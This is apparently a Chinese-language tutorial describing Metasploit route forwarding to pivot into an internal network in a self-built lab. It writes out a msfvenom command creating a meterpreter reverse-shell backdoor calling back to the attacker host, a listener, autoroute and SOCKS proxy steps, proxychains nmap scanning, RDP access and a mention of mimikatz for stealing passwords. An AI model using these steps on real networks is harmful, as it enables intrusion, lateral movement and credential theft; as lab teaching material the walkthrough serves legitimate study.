Metasploit路由转发实现内网渗透
前言
在进行对目标资产进行攻击时,通过外部打点撕开口子是首要条件,但是一般情况下每个资产都有自己的内网段,比如说目标公司的oa系统都是在内网区域,也就是DMZ区。我们通过外部打点进入内网之后紧接着要做的就是对其内网区域进行渗透,我们是没有办法直接去访问的,我们就需要进行路由转发,端口映射等等操作来达到访问内网区域的目的。
测试环境
Win7:绑定域名ly0n.top 外网ip192.168.111.7 内网ip 172.16.1.10
Win2003: 内网IP 172.16.1.17
kali: ip 192.168.111.5
内网渗透
前提情况是我们拿到一个主机的权限
蚁剑连接成功,这时候我们可以使用msf生成一个后门文件,目标机器是window
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.5 LPORT=4444 -f exe -o door.exe |
上传至靶机
然后在kali上设置监听
1 | use exploit/multi/handler |
成功拿到shell
查看网卡信息发现存在内网段
1 | run get_local_subnets 查看内网相关信息 |
1 | run autoroute -s 172.16.1.0/24 添加路由 |
在实际的内网渗透中,我们可以直接添加到 0.0.0.0/0 的路由。这样,只要该被控主机可达的地址就都可达
1 | background返回 |
我们可以用post模块进行信息探测,但内置模块实际用来不是太好用,想要用其他的工具,比如nmap。但有一个问题就是我们在metasploit添加的路由只能在metasploit内使用,而不能应用于任何之外的其他工具。所以可以使用proxychains。这里可以在metasploit开启sock4代理,之后即可使用proxychains基于metasploit开启的代理应用于其他命令行工具。
msf设置sock4代理
1 | use auxiliary/server/sockes4a |
修改proxychains配置文件
然后使用proxychians nmap进行内网扫描,扫描得到一个内网ip为172.16.1.17
然后对该ip进行具体扫描看到开启了3389远程桌面端口
然后使用rdesktop进行远程桌面登录
这里环境为自己搭建,也只是为了演示msf路由转发所以就直接使用密码登录,在不知道密码的情况下可以使用mimikatz抓取密码。